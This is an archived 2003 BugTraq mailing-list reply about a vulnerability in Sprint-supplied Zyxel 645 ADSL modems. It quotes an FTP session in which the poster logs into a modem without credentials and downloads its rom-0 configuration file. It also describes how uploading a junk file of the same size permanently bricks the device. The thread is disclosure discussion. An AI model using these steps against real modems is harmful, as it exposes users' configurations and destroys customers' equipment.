BugTraq
SPRINT ADSL [Zyxel 645 Series Modem] Jan 23 2003 03:36PM
http-equiv@excite.com (http-equiv malware com) (1 replies)
Re: SPRINT ADSL [Zyxel 645 Series Modem] Jan 23 2003 04:05PM
Raymond Dijkxhoorn (raymond prolocation net)
Hi!

> shows 800 out of 2000 [of 100,000 or so] affected modems. Closer
> examination confirms:

> ftp> open malware.com
> Connected to malware.com.
> 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
> User (malware.com:(none)):
> 331 Enter PASS command
> Password:
> 230 Logged in
> ftp> get rom-0
> 200 Port command okay
> 150 Opening data connection for RETR rom-0
> 226 File sent OK
> ftp: 16384 bytes received in 2.03Seconds 8.07Kbytes/sec.
> ftp>

Its even worse, if you upload a config file, same size as the rom-0 file,
but filled with total crap the modem reboots (it does thatautomaticlty
after uploading a new image) and after that the modem is broken. You ONLY
have the ability to upload a new image via a serial port then, and most
customers just have to bring back their unit. The modem is waiting after
upload of a broken image, with a x-modem session. And there it ends. Even
if you upload the previous image it wont work. Nice stuff :(

There are two files you can toy around with in this case, ras and rom-o
ras is the image file, rom-0 is 'just' the config.

Bye,
Raymond.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus